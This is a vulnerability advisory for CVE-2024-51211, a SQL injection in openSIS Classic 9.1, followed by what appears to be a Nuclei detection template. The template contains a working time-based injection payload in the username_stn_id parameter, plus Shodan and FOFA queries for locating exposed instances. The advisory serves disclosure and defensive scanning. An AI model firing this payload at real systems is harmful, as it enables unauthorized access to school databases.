SQL injection vulnerability exists in OS4ED openSIS-Classic Version 9.1, specifically in the resetuserinfo.php file. The vulnerability is due to improper input validation of the $username_stn_id parameter, which can be manipulated by an attacker to inject arbitrary SQL commands.
PoC代码[已公开]
id: CVE-2024-51211
info:
name: openSIS Classic v9.1 - SQL Injection
author: Haliteroglu
severity: critical
description: |
SQL injection vulnerability exists in OS4ED openSIS-Classic Version 9.1, specifically in the resetuserinfo.php file. The vulnerability is due to improper input validation of the $username_stn_id parameter, which can be manipulated by an attacker to inject arbitrary SQL commands.
reference:
- https://github.com/kutsa1/My-CVE/tree/main/CVE-2024-51211
- https://nvd.nist.gov/vuln/detail/CVE-2024-51211
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-51211
cwe-id: CWE-89
epss-score: 0.0657
epss-percentile: 0.90789
metadata:
verified: true
max-request: 1
fofa-query: title="openSIS"
shodan-query: title:"openSIS"
tags: cve,cve2024,sqli,opensis,time-based-sqli,vkev
http:
- raw:
- |
@timeout: 30s
GET /ResetUserInfo.php?user_type_form=username&uname_user_type=uname_student&username_stn_id=21+OR+3720%3dBENCHMARK(7000000,MD5(0x6e48446e))&pass=1&month_username_dob=x&day_username_dob=x&year_username_dob=x HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "duration>=7"
- "contains_all(tolower(body), 'forgotpass.php', 'opensis')"
- "status_code == 200"
condition: and
# digest: 4b0a00483046022100934e0bb2875d3cd3c01c08e5e1a21cd351ed0f0d091d328d36998f1e16df199c022100a6e0c9b0458f1db46b06932fae25addc23f0ee0315f30f50c004fdf8b3295314:922c64590222798bb761d5b6d8e72950